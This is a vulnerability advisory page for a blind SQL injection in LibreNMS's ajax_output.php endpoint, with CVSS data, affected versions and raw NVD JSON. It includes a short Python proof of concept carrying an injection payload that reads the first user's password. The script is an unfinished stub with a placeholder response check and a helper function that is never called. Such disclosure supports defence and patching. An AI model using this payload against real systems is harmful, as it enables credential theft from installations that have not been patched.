Security Vulnerability Report
CVE-2025-65093 CVSS 5.5 MEDIUM

Published: 2025-11-18 23:15:58
Last Modified: 2025-11-20 16:18:23

Description

LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a boolean-based blind SQL injection vulnerability was identified in the LibreNMS application at the /ajax_output.php endpoint. The hostname parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. This issue has been patched in version 25.11.0.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:* - VULNERABLE
LibreNMS < 25.11.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-65093 PoC - Boolean-based Blind SQL Injection
# Target: LibreNMS < 25.11.0
# Endpoint: /ajax_output.php


def extract_char(url, session_cookie, position, char_ascii):
    """Extract a single character from database using boolean-based blind SQLi"""
    payload = f"' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT password from users limit 1),{position},1))={char_ascii}) THEN 1 ELSE 0 END)--"
    cookies = {'PHPSESSID': session_cookie}
    data = {'hostname': payload}
    try:
        response = requests.post(url, data=data, cookies=cookies, timeout=10)
        # Analyze response to determine if condition is true or false
        if 'expected_response_marker' in response.text:
            return True
    except:
        pass
    return False


def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-65093.py <target_url> <session_cookie>")
        print("Example: python cve-2025-65093.py http://target.com/ajax_output.php 'abc123'")
        sys.exit(1)

    target_url = sys.argv[1]
    session_cookie = sys.argv[2]

    print("[*] CVE-2025-65093 - LibreNMS SQL Injection PoC")
    print(f"[*] Target: {target_url}")
    print("[*] Extracting admin password...")
    # Password extraction logic would go here
    print("[!] This PoC demonstrates the injection technique")
    print("[*] Modify payload and target based on your testing environment")


if __name__ == "__main__":
    main()
```

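References

https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9 (Exploit, Vendor Advisory)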

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65093", "sourceIdentifier": "[email protected]", "published": "2025-11-18T23:15:57.690", "lastModified": "2025-11-20T16:18:22.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a boolean-based blind SQL injection vulnerability was identified in the LibreNMS application at the /ajax_output.php endpoint. The hostname parameter is interpolated directly into an SQL query without proper sanitization or parameter binding, allowing an attacker to manipulate the query logic and infer data from the database through conditional responses. This issue has been patched in version 25.11.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:librenms:librenms:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "25.11.0", "matchCriteriaId": "BB2997C4-F47F-4823-8E14-6FBC84E84C74"}]}]}], "references": [{"url": "https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}